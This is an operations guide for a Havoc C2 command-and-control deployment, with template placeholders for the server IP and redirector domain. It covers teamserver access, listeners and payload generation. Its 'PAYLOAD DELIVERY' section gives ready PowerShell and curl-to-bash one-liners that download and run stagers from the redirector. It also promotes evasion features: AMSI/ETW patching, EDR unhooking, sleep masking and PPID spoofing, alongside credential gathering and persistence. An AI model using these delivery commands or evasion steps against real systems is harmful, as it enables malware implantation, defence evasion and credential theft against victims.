HAVOC C2 OPERATIONS GUIDE ========================== This guide provides information on using the Havoc C2 framework (dev branch) deployed on your infrastructure. SERVER INFORMATION ----------------- C2 Server IP: {{ c2_ip }} Redirector Domain: {{ redirector_domain }} Teamserver Port: {{ havoc_teamserver_port | default(40056) }} HTTP Listener Port: {{ havoc_http_port | default(8080) }} HTTPS Listener Port: {{ havoc_https_port | default(443) }} Admin User: {{ havoc_admin_user | default('admin') }} Admin Password: Stored in /root/Tools/havoc/data/profiles/default.yaotl CONNECTING TO THE TEAMSERVER --------------------------- From your local machine: 1. Make sure Havoc client (dev branch) is installed: $ git clone -b dev https://github.com/HavocFramework/Havoc.git $ cd Havoc/Client $ mkdir build && cd build $ cmake -GNinja .. $ ninja 2. Connect to the Teamserver via GUI: - Host: {{ c2_ip }} - Port: {{ havoc_teamserver_port | default(40056) }} - User: {{ havoc_admin_user | default('admin') }} - Password: See /root/Tools/havoc/data/profiles/default.yaotl 3. CLI Connection: $ ./havoc client --address {{ c2_ip }}:{{ havoc_teamserver_port | default(40056) }} --username {{ havoc_admin_user | default('admin') }} --password [password] LISTENERS -------- Two default listeners are configured: - HTTP on port {{ havoc_http_port | default(8080) }} - HTTPS on port {{ havoc_https_port | default(443) }} (through the redirector) To view and manage listeners: Attack → Listeners in the Havoc client. GENERATING PAYLOADS ----------------- Pre-generated payloads are available in /root/Tools/havoc/payloads/ To generate new payloads: 1. Connect to the Teamserver 2. Navigate to Attack → Payload 3. Select the listener (HTTPS recommended) 4. Choose architecture, format, and evasion options 5. For enhanced evasion: Enable indirect syscalls, stack spoofing, and sleep mask PAYLOAD DELIVERY -------------- PowerShell one-liner: powershell -exec bypass -c "iex(New-Object Net.WebClient).DownloadString('https://{{ redirector_domain }}/windows_stager.ps1')" Linux one-liner: curl -s https://{{ redirector_domain }}/linux_stager.sh | bash OPERATIONAL SECURITY ------------------ - All connections are routed through the redirector - Payload customization includes: * Sleep time: {{ havoc_sleep | default(5) }} seconds with {{ havoc_jitter | default(30) }}% jitter * EDR unhooking techniques * AMSI/ETW patching * Indirect syscalls * Sleep masking with technique: {{ havoc_sleep_mask_technique | default(0) }} ADVANCED FEATURES (DEV BRANCH) ---------------------------- - Enhanced memory scanner evasion - PPID spoofing capabilities - Reflective DLL loading improvements - EDR hook detection and avoidance - Process token manipulation - Registry persistence options POST-EXPLOITATION --------------- For post-exploitation, Havoc offers: 1. BOF (Beacon Object Files) support 2. Integrated command & control modules 3. File system operations 4. Process injection & manipulation 5. Credential gathering capabilities SERVER MANAGEMENT --------------- - Havoc Teamserver service: systemctl status havoc - Service configuration: /etc/systemd/system/havoc.service - Configuration profiles: /root/Tools/havoc/data/profiles/ TROUBLESHOOTING -------------- 1. Agent connection issues: - Verify DNS for {{ redirector_domain }} points to your redirector - Check nginx configuration on the redirector - Confirm ports {{ havoc_http_port | default(8080) }} and {{ havoc_https_port | default(443) }} are open 2. Teamserver issues: - Check service: systemctl status havoc - View logs: journalctl -u havoc - Restart if needed: systemctl restart havoc 3. Use Havoc client CLI debugging: ./havoc client --address {{ c2_ip }}:{{ havoc_teamserver_port | default(40056) }} --username {{ havoc_admin_user | default('admin') }} --password [password] --debug